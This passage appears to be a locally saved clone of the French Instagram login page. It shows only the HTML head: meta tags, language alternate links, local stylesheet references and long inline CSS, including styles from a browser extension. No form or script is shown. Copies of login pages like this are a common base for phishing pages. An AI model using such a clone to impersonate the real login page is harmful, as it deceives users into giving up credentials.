<html lang="fr" class="js not-logged-in client-root touch js-focus-visible sDN5V"><head>
        
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">

        <title>Connexion • Instagram</title>

        
        <meta name="robots" content="noimageindex, noarchive">
        <meta name="apple-mobile-web-app-status-bar-style" content="default">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="theme-color" content="#ffffff">
        <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">

        <link rel="preload" href="css/af986a96d279.css" as="style" type="text/css" crossorigin="anonymous">
        <link rel="preload" href="css/04779c068c3a.css" as="style" type="text/css" crossorigin="anonymous">
        <link rel="preload" href="css/6422eae3aab5.css" as="style" type="text/css" crossorigin="anonymous">
        <link rel="preload" href="css/ec2ddf131f68.css" as="style" type="text/css" crossorigin="anonymous">
        <link rel="preload" href="css/c9eae584ca84.css" as="style" type="text/css" crossorigin="anonymous">
        <link rel="prefetch" as="stylesheet" href="css/0b2ccc8110eb.css" type="text/css" crossorigin="anonymous">
                

    
                <link rel="apple-touch-icon-precomposed" sizes="76x76" href="/static/images/ico/apple-touch-icon-76x76-precomposed.png/666282be8229.png">
                <link rel="apple-touch-icon-precomposed" sizes="120x120" href="/static/images/ico/apple-touch-icon-120x120-precomposed.png/8a5bd3f267b1.png">
                <link rel="apple-touch-icon-precomposed" sizes="152x152" href="/static/images/ico/apple-touch-icon-152x152-precomposed.png/68193576ffc5.png">
                <link rel="apple-touch-icon-precomposed" sizes="167x167" href="/static/images/ico/apple-touch-icon-167x167-precomposed.png/4985e31c9100.png">
                <link rel="apple-touch-icon-precomposed" sizes="180x180" href="/static/images/ico/apple-touch-icon-180x180-precomposed.png/c06fdb2357bd.png">
                
                    <link rel="icon" sizes="192x192" href="img/68d99ba29cc8.png">
                
            
            
                    <link rel="mask-icon" href="/static/images/ico/favicon.svg/fc72dd4bfde8.svg" color="#262626">
                  
                  <link rel="shortcut icon" type="image/x-icon" href="/static/images/ico/favicon.ico/36b3ee2d91ed.ico">
                
            
            
            
    
                    <meta content="Heureux de vous revoir sur Instagram. Connectez-vous pour voir ce que vos amis, votre famille et les profils liés à vos centres d’intérêt dans le monde entier ont capturé et partagé." name="description">
                    <link rel="canonical" href="https://www.instagram.com/accounts/login/">
                
<link rel="alternate" href="https://www.instagram.com/accounts/login/" hreflang="x-default">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=en" hreflang="en">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=fr" hreflang="fr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=it" hreflang="it">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=de" hreflang="de">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es" hreflang="es">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=zh-cn" hreflang="zh-cn">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=zh-tw" hreflang="zh-tw">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ja" hreflang="ja">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ko" hreflang="ko">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=pt" hreflang="pt">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=pt-br" hreflang="pt-br">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=af" hreflang="af">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=cs" hreflang="cs">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=da" hreflang="da">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=el" hreflang="el">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=fi" hreflang="fi">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=hr" hreflang="hr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=hu" hreflang="hu">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=id" hreflang="id">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ms" hreflang="ms">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=nb" hreflang="nb">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=nl" hreflang="nl">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=pl" hreflang="pl">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ru" hreflang="ru">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=sk" hreflang="sk">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=sv" hreflang="sv">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=th" hreflang="th">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=tl" hreflang="tl">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=tr" hreflang="tr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=hi" hreflang="hi">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=bn" hreflang="bn">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=gu" hreflang="gu">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=kn" hreflang="kn">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ml" hreflang="ml">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=mr" hreflang="mr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=pa" hreflang="pa">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ta" hreflang="ta">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=te" hreflang="te">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ne" hreflang="ne">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=si" hreflang="si">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ur" hreflang="ur">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=vi" hreflang="vi">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=bg" hreflang="bg">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=fr-ca" hreflang="fr-ca">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=ro" hreflang="ro">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=sr" hreflang="sr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=uk" hreflang="uk">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=zh-hk" hreflang="zh-hk">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-do">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-ve">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-sv">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-pr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-mx">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-ni">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-py">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-cl">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-co">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-pa">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-ar">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-hn">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-cu">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-uy">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-bo">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-pe">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-cr">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-ec">
<link rel="alternate" href="https://www.instagram.com/accounts/login/?hl=es-la" hreflang="es-gt">

<link href="css/c9eae584ca84.css" type="text/css" crossorigin="anonymous" rel="stylesheet">

<style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_dialog_advanced{border-radius:8px;padding:10px}.fb_dialog_content{background:#fff;color:#373737}.fb_dialog_close_icon{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{left:5px;right:auto;top:5px}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent}.fb_dialog_close_icon:active{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #365899;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{height:100%;left:0;margin:0;overflow:visible;position:absolute;top:-10000px;transform:none;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{background:none;height:auto;min-height:initial;min-width:initial;width:auto}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{clear:both;color:#fff;display:block;font-size:18px;padding-top:20px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .4);bottom:0;left:0;min-height:100%;position:absolute;right:0;top:0;width:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_mobile .fb_dialog_iframe{position:sticky;top:0}.fb_dialog_content .dialog_header{background:linear-gradient(from(#738aba), to(#2c4987));border-bottom:1px solid;border-color:#043b87;box-shadow:white 0 1px 1px -1px inset;color:#fff;font:bold 14px Helvetica, sans-serif;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:linear-gradient(from(#4267B2), to(#2a4887));background-clip:padding-box;border:1px solid #29487d;border-radius:3px;display:inline-block;line-height:18px;margin-top:3px;max-width:85px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{background:none;border:none;color:#fff;font:bold 12px Helvetica, sans-serif;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #4a4a4a;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);background-position:50% 50%;background-repeat:no-repeat;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}</style><style type="text/css">/* http://meyerweb.com/eric/tools/css/reset/ 
   v2.0 | 20110126
   License: none (public domain)
*/

#wanteeed html, #wanteeed body, #wanteeed div, #wanteeed span, #wanteeed applet, #wanteeed object, #wanteeed iframe,
#wanteeed h1, #wanteeed h2, #wanteeed h3, #wanteeed h4, #wanteeed h5, #wanteeed h6, #wanteeed p, #wanteeed blockquote, #wanteeed pre,
#wanteeed a, #wanteeed abbr, #wanteeed acronym, #wanteeed address, #wanteeed big, #wanteeed cite, #wanteeed code,
#wanteeed del, #wanteeed dfn, #wanteeed em, #wanteeed img, #wanteeed ins, #wanteeed kbd, #wanteeed q, #wanteeed s, #wanteeed samp,
#wanteeed small, #wanteeed strike, #wanteeed strong, #wanteeed sub, #wanteeed sup, #wanteeed tt, #wanteeed var,
#wanteeed b, #wanteeed u, #wanteeed i, #wanteeed center,
#wanteeed dl, #wanteeed dt, #wanteeed dd, #wanteeed ol, #wanteeed ul, #wanteeed li,
#wanteeed fieldset, #wanteeed form, #wanteeed label, #wanteeed legend,
#wanteeed table, #wanteeed caption, #wanteeed tbody, #wanteeed tfoot, #wanteeed thead, #wanteeed tr, #wanteeed th, #wanteeed td,
#wanteeed article, #wanteeed aside, #wanteeed canvas, #wanteeed details, #wanteeed embed, 
#wanteeed figure, #wanteeed figcaption, #wanteeed footer, #wanteeed header, #wanteeed hgroup, 
#wanteeed menu, #wanteeed nav, #wanteeed output, #wanteeed ruby, #wanteeed section, #wanteeed summary,
#wanteeed time, #wanteeed mark, #wanteeed audio, #wanteeed video, #wanteeed button {
    margin: 0;
    padding: 0;
    border: 0;
    /*font-size: 100%;
    font: inherit;*/
    font:13px "Verdana", sans-serif;
    text-align:left;
    vertical-align: baseline;
    -webkit-box-shadow: none;
    -webkit-box-sizing:initial;
    box-sizing:initial;
    box-shadow: none;
    color:#555555;
    text-transform:none;
}
/* HTML5 display-role reset for older browsers */
#wanteeed article, #wanteeed aside, #wanteeed details, #wanteeed figcaption, #wanteeed figure, 
#wanteeed footer, #wanteeed header, #wanteeed hgroup, #wanteeed menu, #wanteeed nav, #wanteeed section {
    display: block;
}
#wanteeed body {
    line-height: 1;
}
#wanteeed ol, #wanteeed ul {
    list-style: none;
}
#wanteeed blockquote, #wanteeed q {
    quotes: none;
}
#wanteeed blockquote:before, #wanteeed blockquote:after,
#wanteeed q:before, #wanteeed q:after {
    content: '';
    content: none;
}
#wanteeed table {
    border-collapse: collapse;
    border-spacing: 0;
}

/*report*/

#wanteeed-report html, #wanteeed-report body, #wanteeed-report div, #wanteeed-report span, #wanteeed-report applet, #wanteeed-report object, #wanteeed-report iframe,
#wanteeed-report h1, #wanteeed-report h2, #wanteeed-report h3, #wanteeed-report h4, #wanteeed-report h5, #wanteeed-report h6, #wanteeed-report p, #wanteeed-report blockquote, #wanteeed-report pre,
#wanteeed-report a, #wanteeed-report abbr, #wanteeed-report acronym, #wanteeed-report address, #wanteeed-report big, #wanteeed-report cite, #wanteeed-report code,
#wanteeed-report del, #wanteeed-report dfn, #wanteeed-report em, #wanteeed-report img, #wanteeed-report ins, #wanteeed-report kbd, #wanteeed-report q, #wanteeed-report s, #wanteeed-report samp,
#wanteeed-report small, #wanteeed-report strike, #wanteeed-report strong, #wanteeed-report sub, #wanteeed-report sup, #wanteeed-report tt, #wanteeed-report var,
#wanteeed-report b, #wanteeed-report u, #wanteeed-report i, #wanteeed-report center,
#wanteeed-report dl, #wanteeed-report dt, #wanteeed-report dd, #wanteeed-report ol, #wanteeed-report ul, #wanteeed-report li,
#wanteeed-report fieldset, #wanteeed-report form, #wanteeed-report label, #wanteeed-report legend,
#wanteeed-report table, #wanteeed-report caption, #wanteeed-report tbody, #wanteeed-report tfoot, #wanteeed-report thead, #wanteeed-report tr, #wanteeed-report th, #wanteeed-report td,
#wanteeed-report article, #wanteeed-report aside, #wanteeed-report canvas, #wanteeed-report details, #wanteeed-report embed, 
#wanteeed-report figure, #wanteeed-report figcaption, #wanteeed-report footer, #wanteeed-report header, #wanteeed-report hgroup, 
#wanteeed-report menu, #wanteeed-report nav, #wanteeed-report output, #wanteeed-report ruby, #wanteeed-report section, #wanteeed-report summary,
#wanteeed-report time, #wanteeed-report mark, #wanteeed-report audio, #wanteeed-report video, #wanteeed-report button {
    margin: 0;
    padding: 0;
    border: 0;
    /*font-size: 100%;*/
    text-align:left;
    font:13px "Verdana", sans-serif;
    vertical-align: baseline;
    -webkit-box-shadow: none;
    -webkit-box-sizing:initial;
    box-sizing:initial;
    box-shadow: none;
    color:#555555;
    text-transform:none;
}
/* HTML5 display-role reset for older browsers */
#wanteeed-report article, #wanteeed-report aside, #wanteeed-report details, #wanteeed-report figcaption, #wanteeed-report figure, 
#wanteeed-report footer, #wanteeed-report header, #wanteeed-report hgroup, #wanteeed-report menu, #wanteeed-report nav, #wanteeed-report section {
    display: block;
}
#wanteeed-report body {
    line-height: 1;
}
#wanteeed-report ol, #wanteeed-report ul {
    list-style: none;
}
#wanteeed-report blockquote, #wanteeed-report q {
    quotes: none;
}
#wanteeed-report blockquote:before, #wanteeed-report blockquote:after,
#wanteeed-report q:before, #wanteeed-report q:after {
    content: '';
    content: none;
}

/*main item **/


.wanteeed-main-item html, .wanteeed-main-item body, .wanteeed-main-item div, .wanteeed-main-item span, .wanteeed-main-item applet, .wanteeed-main-item object, .wanteeed-main-item iframe,
.wanteeed-main-item h1, .wanteeed-main-item h2, .wanteeed-main-item h3, .wanteeed-main-item h4, .wanteeed-main-item h5, .wanteeed-main-item h6, .wanteeed-main-item p, .wanteeed-main-item blockquote, .wanteeed-main-item pre,
.wanteeed-main-item a, .wanteeed-main-item abbr, .wanteeed-main-item acronym, .wanteeed-main-item address, .wanteeed-main-item big, .wanteeed-main-item cite, .wanteeed-main-item code,
.wanteeed-main-item del, .wanteeed-main-item dfn, .wanteeed-main-item em, .wanteeed-main-item img, .wanteeed-main-item ins, .wanteeed-main-item kbd, .wanteeed-main-item q, .wanteeed-main-item s, .wanteeed-main-item samp,
.wanteeed-main-item small, .wanteeed-main-item strike, .wanteeed-main-item strong, .wanteeed-main-item sub, .wanteeed-main-item sup, .wanteeed-main-item tt, .wanteeed-main-item var,
.wanteeed-main-item b, .wanteeed-main-item u, .wanteeed-main-item i, .wanteeed-main-item center,
.wanteeed-main-item dl, .wanteeed-main-item dt, .wanteeed-main-item dd, .wanteeed-main-item ol, .wanteeed-main-item ul, .wanteeed-main-item li,
.wanteeed-main-item fieldset, .wanteeed-main-item form, .wanteeed-main-item label, .wanteeed-main-item legend,
.wanteeed-main-item table, .wanteeed-main-item caption, .wanteeed-main-item tbody, .wanteeed-main-item tfoot, .wanteeed-main-item thead, .wanteeed-main-item tr, .wanteeed-main-item th, .wanteeed-main-item td,
.wanteeed-main-item article, .wanteeed-main-item aside, .wanteeed-main-item canvas, .wanteeed-main-item details, .wanteeed-main-item embed, 
.wanteeed-main-item figure, .wanteeed-main-item figcaption, .wanteeed-main-item footer, .wanteeed-main-item header, .wanteeed-main-item hgroup, 
.wanteeed-main-item menu, .wanteeed-main-item nav, .wanteeed-main-item output, .wanteeed-main-item ruby, .wanteeed-main-item section, .wanteeed-main-item summary,
.wanteeed-main-item time, .wanteeed-main-item mark, .wanteeed-main-item audio, .wanteeed-main-item video, .wanteeed-main-item button {
    margin: 0;
    padding: 0;
    border: 0;
    /*font-size: 100%;*/
    text-align:left;
    font:13px "Verdana", sans-serif;
    vertical-align: baseline;
    -webkit-box-shadow: none;
    -webkit-box-sizing:initial;
    box-sizing:initial;
    box-shadow: none;
    color:#555555;
    text-transform:none;
}
/* HTML5 display-role reset for older browsers */
.wanteeed-main-item article, .wanteeed-main-item aside, .wanteeed-main-item details, .wanteeed-main-item figcaption, .wanteeed-main-item figure, 
.wanteeed-main-item footer, .wanteeed-main-item header, .wanteeed-main-item hgroup, .wanteeed-main-item menu, .wanteeed-main-item nav, .wanteeed-main-item section {
    display: block;
}
.wanteeed-main-item body {
    line-height: 1;
}
.wanteeed-main-item ol, .wanteeed-main-item ul {
    list-style: none;
}
.wanteeed-main-item blockquote, .wanteeed-main-item q {
    quotes: none;
}
.wanteeed-main-item blockquote:before, .wanteeed-main-item blockquote:after,
.wanteeed-main-item q:before, .wanteeed-main-item q:after {
    content: '';
    content: none;
}




#wanteeed-report table {
    border-collapse: collapse;
    border-spacing: 0;
}

#wanteeed-progress-bar div  {
    background-size: 30px 30px;
    color:white;
    background-color:rgb(209, 43, 53);
    background-image: linear-gradient(135deg, rgba(255, 255, 255, .15) 25%, transparent 25%,
                        transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%,
                        transparent 75%, transparent);            
    
    -webkit-animation: animate-stripes 3s linear infinite;             
}


@-webkit-keyframes animate-stripes
{
    from {
        background-position: 0 0;
    }
    to {
       background-position: 60px 0;
    }
}</style>

<style type="text/css">/* ========================================================================
 * bootstrap-tour - v0.10.1
 * http://bootstraptour.com
 * ========================================================================
 * Copyright 2012-2013 Ulrich Sossou
 *
 * ========================================================================
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 * ========================================================================
 */

/*!
 * Bootstrap v3.1.0 (http://getbootstrap.com)
 * Copyright 2011-2014 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 */



.popover-wanteeed html, .popover-wanteeed body, .popover-wanteeed div, .popover-wanteeed span, .popover-wanteeed applet, .popover-wanteeed object, .popover-wanteeed iframe,
.popover-wanteeed h1, .popover-wanteeed h2, .popover-wanteeed h3, .popover-wanteeed h4, .popover-wanteeed h5, .popover-wanteeed h6, .popover-wanteeed p, .popover-wanteeed blockquote, .popover-wanteeed pre,
.popover-wanteeed a, .popover-wanteeed abbr, .popover-wanteeed acronym, .popover-wanteeed address, .popover-wanteeed big, .popover-wanteeed cite, .popover-wanteeed code,
.popover-wanteeed del, .popover-wanteeed dfn, .popover-wanteeed em, .popover-wanteeed img, .popover-wanteeed ins, .popover-wanteeed kbd, .popover-wanteeed q, .popover-wanteeed s, .popover-wanteeed samp,
.popover-wanteeed small, .popover-wanteeed strike, .popover-wanteeed strong, .popover-wanteeed sub, .popover-wanteeed sup, .popover-wanteeed tt, .popover-wanteeed var,
.popover-wanteeed b, .popover-wanteeed u, .popover-wanteeed i, .popover-wanteeed center,
.popover-wanteeed dl, .popover-wanteeed dt, .popover-wanteeed dd, .popover-wanteeed ol, .popover-wanteeed ul, .popover-wanteeed li,
.popover-wanteeed fieldset, .popover-wanteeed form, .popover-wanteeed label, .popover-wanteeed legend,
.popover-wanteeed table, .popover-wanteeed caption, .popover-wanteeed tbody, .popover-wanteeed tfoot, .popover-wanteeed thead, .popover-wanteeed tr, .popover-wanteeed th, .popover-wanteeed td,
.popover-wanteeed article, .popover-wanteeed aside, .popover-wanteeed canvas, .popover-wanteeed details, .popover-wanteeed embed,
.popover-wanteeed figure, .popover-wanteeed figcaption, .popover-wanteeed footer, .popover-wanteeed header, .popover-wanteeed hgroup,
.popover-wanteeed menu, .popover-wanteeed nav, .popover-wanteeed output, .popover-wanteeed ruby, .popover-wanteeed section, .popover-wanteeed summary,
.popover-wanteeed time, .popover-wanteeed mark, .popover-wanteeed audio, .popover-wanteeed video, .popover-wanteeed button {
    margin: 0;
    padding: 0;
    border: 0;
    /*font-size: 100%;
    font: inherit;*/
    font:13px "Verdana", sans-serif;
    text-align:left;
    vertical-align: baseline;
    -webkit-box-shadow: none;
    -webkit-box-sizing:initial;
    box-sizing:initial;
    box-shadow: none;
    color:#555555;
    text-transform:none;
    background:none;
    bottom:inherit ;
}

.popover-wanteeed .btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  vertical-align: middle;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  white-space: nowrap;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 4px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.popover-wanteeed .btn:focus,
.popover-wanteeed .btn:active:focus,
.popover-wanteeed .btn.active:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.popover-wanteeed .btn:hover,
.popover-wanteeed .btn:focus {
  color: #333333;
  text-decoration: none;
}
.popover-wanteeed .btn:active,
.popover-wanteeed .btn.active {
  outline: 0;
  background-image: none;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.popover-wanteeed .btn.disabled,
.popover-wanteeed .btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  pointer-events: none;
  opacity: 0.65;
  filter: alpha(opacity=65);
  -webkit-box-shadow: none;
  box-shadow: none;
}
.popover-wanteeed .btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.popover-wanteeed .btn-default:hover,
.popover-wanteeed .btn-default:focus,
.popover-wanteeed .btn-default:active,
.popover-wanteeed .btn-default.active,
.popover-wanteeed .open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.popover-wanteeed .btn-default:active,
.popover-wanteeed .btn-default.active,
.popover-wanteeed .open > .dropdown-toggle.btn-default {
  background-image: none;
}
.popover-wanteeed .btn-default.disabled,
.popover-wanteeed .btn-default[disabled],
.popover-wanteeed fieldset[disabled] .btn-default,
.popover-wanteeed .btn-default.disabled:hover,
.popover-wanteeed .btn-default[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-default:hover,
.popover-wanteeed .btn-default.disabled:focus,
.popover-wanteeed .btn-default[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-default:focus,
.popover-wanteeed .btn-default.disabled:active,
.popover-wanteeed .btn-default[disabled]:active,
.popover-wanteeed fieldset[disabled] .btn-default:active,
.popover-wanteeed .btn-default.disabled.active,
.popover-wanteeed .btn-default[disabled].active,
.popover-wanteeed fieldset[disabled] .btn-default.active {
  background-color: #ffffff;
  border-color: #cccccc;
}
.popover-wanteeed .btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.popover-wanteeed .btn-primary {
  color: #ffffff;
  background-color: #428bca;
  border-color: #357ebd;
}
.popover-wanteeed .btn-primary:hover,
.popover-wanteeed .btn-primary:focus,
.popover-wanteeed .btn-primary:active,
.popover-wanteeed .btn-primary.active,
.popover-wanteeed .open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #3071a9;
  border-color: #285e8e;
}
.popover-wanteeed .btn-primary:active,
.popover-wanteeed .btn-primary.active,
.popover-wanteeed .open > .dropdown-toggle.btn-primary {
  background-image: none;
}
.popover-wanteeed .btn-primary.disabled,
.popover-wanteeed .btn-primary[disabled],
.popover-wanteeed fieldset[disabled] .btn-primary,
.popover-wanteeed .btn-primary.disabled:hover,
.popover-wanteeed .btn-primary[disabled]:hover,
.popover-wanteeed fieldset[disabled] .btn-primary:hover,
.popover-wanteeed .btn-primary.disabled:focus,
.popover-wanteeed .btn-primary[disabled]:focus,
.popover-wanteeed fieldset[disabled] .btn-primary:focus,
.popover-wanteeed .btn-primary.disabled:active,
.popover-wanteeed .btn-primary[disabled]:active,
.popover-wanteeed fieldset[disabled] .btn-primary:active,
.popover-wanteeed .btn-primary.disabled.active,
.popover-wanteeed .btn-primary[disabled].active,
.popover-wanteeed fieldset[disabled] .btn-primary.active {
  background-color: #428bca;
  border-color: #357ebd;
}
.popover-wanteeed .btn-primary .badge {
  color: #428bca;
